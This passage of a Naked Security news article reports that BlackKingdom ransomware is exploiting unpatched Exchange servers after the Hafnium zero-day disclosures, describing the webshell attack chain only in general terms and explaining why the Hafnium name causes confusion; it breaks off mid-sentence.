BlackKingdom ransomware still exploiting insecure Exchange servers – Naked Security
It’s three weeks since the word HAFNIUM hit the news.
The word Hafnium refers to a cybergang who are said to focus on stealing data from pretty much anyone and everyone they can infiltrate, across an eclectic range of industry sectors, and this time they hit a sort-of cybercrime jackpot.
The Hafnium crew, it turned out, not only knew about four zero-day vulnerabilities in Microsoft Exchange, but also knew how to exploit these bugs reliably in order to walk into unprotected networks almost at will.
The Exchange bugs didn’t include a remote code exeution (RCE) hole to give the crooks the direct and immediate access to a compromised server, but the bugs did allow the crooks to rig up RCE using a trick known as a webshell.
Greatly simplified, the attack goes like this:
- Exploit the Exchange bugs to write a booby-trapped web file called a webshell onto a vulnerable server.
- Trigger the booby-trapped web page hosting the webshell to run a Powershell (or similar) command to download further malware, such as a fully-featured backdoor toolkit.
- Enter at will and, very loosely speaking, commit whatever cybercrimes are on today’s “to do” list.
Unfortunately, as we explained when this news first broke, the name Hafnium caused fourfold confusion:
- Although Hafnium is often written in ALL CAPS, it’s not an acronym, so it doesn’t stand for something specific that you can protect against and then stand down from.
- Although Hafnium refers to a specific cybergang, the zero-day exploits they were using were already widely known to other criminals, and working examples soon became available online for anyone and everyone to download and use, both for legitimate research and for launching attacks.
- Although Hafnium attacks were associated with Microsoft Exchange in media coverage, the attacks these crooks were carrying out once they got in were not specific to networks using Exchange. The cybercrimes they ultimately committed could be initiated in many other ways.
- Although Hafnium was associated with data exfiltration and thus with potential industrial espionage, intrusions via these Exchange bugs could lead to many other crimes, notably including ransomware attacks.
It’s the last…